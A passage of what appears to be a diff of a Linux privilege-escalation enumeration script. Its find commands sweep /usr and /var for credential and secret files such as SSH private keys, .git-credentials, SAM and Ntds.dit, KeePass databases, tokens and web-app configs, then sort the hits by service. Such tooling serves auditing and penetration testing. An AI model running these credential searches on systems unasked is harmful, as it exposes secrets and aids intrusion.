-name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"agent*\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_USR=`eval_bckgrd "find /usr -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"ssh*config\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_VAR=`eval_bckgrd "find /var -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` wait # Always wait at the end CONT_THREADS=0 #Reset the threads counter #GENERATE THE STORAGES OF THE FOUND FILES - PSTORAGE_SYSTEMD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^/lib64|^/opt|^/systemd|^/bin|^/etc|^/lib32|^/private|^/run|^/tmp|^/lib|^/system|^/applications|^/.cache|^/srv|^/snap|^$GREPHOMESEARCH|^/sbin|^/sys|^/var|^/mnt|^/cdrom|^/media" | grep -E ".*\.service$" | sort | uniq | head -n 70) - PSTORAGE_TIMER=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^/lib64|^/opt|^/systemd|^/bin|^/etc|^/lib32|^/private|^/run|^/tmp|^/lib|^/system|^/applications|^/.cache|^/srv|^/snap|^$GREPHOMESEARCH|^/sbin|^/sys|^/var|^/mnt|^/cdrom|^/media" | grep -E ".*\.timer$" | sort | uniq | head -n 70) - PSTORAGE_SOCKET=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^/lib64|^/opt|^/systemd|^/bin|^/etc|^/lib32|^/private|^/run|^/tmp|^/lib|^/system|^/applications|^/.cache|^/srv|^/snap|^$GREPHOMESEARCH|^/sbin|^/sys|^/var|^/mnt|^/cdrom|^/media" | grep -E ".*\.socket$" | sort | uniq | head -n 70) - PSTORAGE_DBUS=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) - PSTORAGE_MYSQL=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mysql$" | sort | uniq | head -n 70) - PSTORAGE_MARIADB=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70) - PSTORAGE_POSTGRESQL=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) - PSTORAGE_APACHE=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$" | sort | uniq | head -n 70) - PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/private|^/tmp|^/mnt|^/var" | grep -E "sess_.*$" | sort | uniq | head -n 70) - PSTORAGE_PHP_FILES=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_WORDPRESS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) - PSTORAGE_DRUPAL=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E '/default/settings.php' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_MOODLE=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E 'moodle/config.php' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "config\.php$" | sort | uniq | head -n 70) - PSTORAGE_TOMCAT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) - PSTORAGE_MONGO=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) - PSTORAGE_SUPERVISORD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) - PSTORAGE_CESI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) - PSTORAGE_RSYNC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E 